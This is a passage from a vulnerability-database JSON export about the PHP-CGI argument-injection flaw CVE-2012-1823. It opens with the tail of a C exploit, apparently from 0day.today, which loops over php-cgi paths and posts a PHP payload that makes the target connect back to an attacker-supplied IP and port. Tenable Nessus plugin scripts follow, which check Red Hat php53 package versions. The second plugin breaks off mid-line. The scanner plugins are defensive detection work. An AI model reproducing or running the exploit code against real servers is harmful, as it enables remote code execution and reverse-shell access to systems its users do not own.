4:\r\n reverseport = atoi(optarg); \r\n reverseportstr = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!reverseportstr) {\r\n printf(\"calloc error (5)\\n\");\r\n exit(255);\r\n }\r\n memcpy(reverseportstr, optarg, strlen(optarg)+1); \r\n break;\r\n case 5:\r\n forceinterpreter = calloc(strlen(optarg)+1, sizeof(char));\r\n if (!forceinterpreter) {\r\n printf(\"calloc error (6)\\n\");\r\n exit(255);\r\n }\r\n memcpy(forceinterpreter, optarg, strlen(optarg)+1); \r\n break;\r\n default:\r\n usage(argv);\r\n }\r\n break;\r\n \r\n default:\r\n usage(argv);\r\n }\r\n }\r\n\r\n if ((optind < argc) || !target || !protocol || !port ||\r\n !reverseip || !reverseport){\r\n usage(argv);\r\n }\r\n \r\n server = gethostbyname_(target, port);\r\n if (!server) {\r\n printf(\"Error while resolving hostname. (7)\\n\");\r\n exit(255);\r\n }\r\n\r\n char *interpreters[5];\r\n int ninterpreters = 5;\r\n interpreters[0] = strdup(\"/cgi-bin/php\");\r\n interpreters[1] = strdup(\"/cgi-bin/php5\");\r\n interpreters[2] = strdup(\"/cgi-bin/php-cgi\");\r\n interpreters[3] = strdup(\"/cgi-bin/php.cgi\");\r\n interpreters[4] = strdup(\"/cgi-bin/php4\");\r\n \r\n for (i=0;i<ninterpreters;i++) {\r\n interpreter = interpreters[i];\r\n if (forceinterpreter) {\r\n interpreter = strdup(forceinterpreter);\r\n }\r\n if (forceinterpreter && i)\r\n break;\r\n printf(\"%s\\n\", interpreter);\r\n \r\n sockfd = socket(AF_INET, SOCK_STREAM, 0);\r\n if (sockfd < 1) { \r\n printf(\"socket error (8)\\n\");\r\n exit(255);\r\n }\r\n \r\n if (connect(sockfd, (void*)server, sizeof(struct sockaddr_in)) < 0) {\r\n printf(\"connect error (9)\\n\");\r\n exit(255); \r\n }\r\n if (httpsflag) {\r\n sslconnection = (connection*) malloc(sizeof(connection));\r\n if (!sslconnection) {\r\n printf(\"malloc error (10)\\n\");\r\n exit(255); \r\n }\r\n sslconnection->handle = NULL;\r\n sslconnection->ctx = NULL;\r\n\r\n SSL_library_init();\r\n\r\n sslconnection->ctx = SSL_CTX_new(SSLv23_client_method());\r\n if (!sslconnection->ctx) {\r\n printf(\"SSL_CTX_new error (11)\\n\");\r\n exit(255);\r\n }\r\n\r\n sslconnection->handle = SSL_new(sslconnection->ctx);\r\n if (!sslconnection->handle) {\r\n printf(\"SSL_new error (12)\\n\");\r\n exit(255); \r\n }\r\n if (!SSL_set_fd(sslconnection->handle, sockfd)) {\r\n printf(\"SSL_set_fd error (13)\\n\");\r\n exit(255);\r\n }\r\n \r\n if (SSL_connect(sslconnection->handle) != 1) {\r\n printf(\"SSL_connect error (14)\\n\");\r\n exit(255); \r\n }\r\n }\r\n \r\n tmpsize = strlen(phpstr) + strlen(reverseip) + strlen(reverseportstr) + 64;\r\n tmpstr = (char*)calloc(tmpsize, sizeof(char));\r\n snprintf(tmpstr, tmpsize, phpstr, reverseip, reverseport);\r\n \r\n writesize = strlen(target) + strlen(interpreter) + \r\n strlen(poststr) + strlen(tmpstr) + 64;\r\n writestr = (char*)calloc(writesize, sizeof(char));\r\n snprintf(writestr, writesize, poststr, interpreter,\r\n target, strlen(tmpstr), tmpstr);\r\n \r\n if (!httpsflag) {\r\n write(sockfd, writestr, strlen(writestr));\r\n readbuf = read_(sockfd);\r\n } else {\r\n SSL_write(sslconnection->handle, writestr, strlen(writestr));\r\n readbuf = sslread(sslconnection);\r\n }\r\n \r\n if (readbuf) {\r\n printf(\"***SERVER RESPONSE***\\n\\n%s\\n\\n\", readbuf); \r\n } else {\r\n printf(\"read error (15)\\n\");\r\n exit(255); \r\n }\r\n }\r\n exit(1);\r\n}\n\n# 0day.today [2018-04-10] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21429"}], "nessus": [{"lastseen": "2020-03-18T02:22:29", "bulletinFamily": "scanner", "description": "Updated php53 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2020-03-02T00:00:00", "id": "REDHAT-RHSA-2012-0547.NASL", "href": "https://www.tenable.com/plugins/nessus/59031", "published": "2012-05-08T00:00:00", "title": "RHEL 5 : php53 (RHSA-2012:0547)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0547. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59031);\n script_version (\"1.25\");\n script_cvs_date(\"Date: 2019/10/24 15:35:35\");\n\n script_cve_id(\"CVE-2012-1823\");\n script_bugtraq_id(53388);\n script_xref(name:\"RHSA\", value:\"2012:0547\");\n\n script_name(english:\"RHEL 5 : php53 (RHSA-2012:0547)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php53 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available\nthat allows remote code execution in affected PHP CGI configurations.\nThis flaw does not affect the default configuration using the PHP\nmodule for Apache httpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1823\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/05/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0547\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-bcmath-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-bcmath-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-bcmath-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-cli-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-cli-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-cli-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-common-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-common-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-common-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-dba-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-dba-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-dba-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-devel-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-devel-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-devel-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-gd-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-gd-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-gd-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-imap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-imap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-imap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-intl-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-intl-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-intl-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-ldap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-ldap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-ldap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-mbstring-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-mbstring-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-mbstring-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-mysql-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-mysql-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-mysql-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-odbc-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-odbc-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-odbc-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-pdo-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-pdo-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-pdo-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-pgsql-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-pgsql-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-pgsql-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-process-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-process-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-process-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-pspell-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-pspell-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-pspell-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-snmp-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-snmp-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-snmp-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-soap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-soap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-soap-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-xml-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-xml-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-xml-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php53-xmlrpc-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php53-xmlrpc-5.3.3-7.el5_8\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php53-xmlrpc-5.3.3-7.el5_8\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php53 / php53-bcmath / php53-cli / php53-common / php53-dba / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-18T02:22:29", "bulletinFamily": "scanner", "description": "Updated php53 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script", "modified": "2020-03-02T00:00:00", "id": "REDHAT-RHSA-2012-0569.NASL", "href": "https://www.tenable.com/plugins/nessus/64036", "published": "2013-01-24T00:00:00", "title": "RHEL 5 : php53 (RHSA-2012:0569)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0569. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(64036);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/10/24 15:35:35\");\n\n script_cve_id(\"CVE-2012-1823\");\n script_xref(name:\"RHSA\", value:\"2012:0569\");\n\n script_name(english:\"RHEL 5 : php53 (RHSA-2012:0569)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php53 packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Extended Update Support.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. A Common Vulnerability Scoring System (CVSS)\nbase score, which gives a detailed severity rating, is available from\nthe CVE link in the References section.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Server.\n\nA flaw was found in the way the php-cgi executable processed command\nline arguments when running in CGI mode. A remote attacker could send\na specially crafted request to a PHP script that would result in the\nquery string being parsed by php-cgi as command line options and\narguments. This could lead to the disclosure of the script's source\ncode or arbitrary code execution with the privileges of the PHP\ninterpreter. (CVE-2012-1823)\n\nRed Hat is aware that a public exploit for this issue is available\nthat allows remote code execution in affected PHP CGI configurations.\nThis flaw does not affect the default configuration using the PHP\nmodule for Apache httpd to handle PHP scripts.\n\nAll php53 users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing the\nupdated packages, the httpd daemon must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0569\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-1823\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP CGI Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php53-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5\\.6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0569\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"php53-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"php53-bcmath-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"s390x\", reference:\"php53-bcmath-5.3.3-1.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", 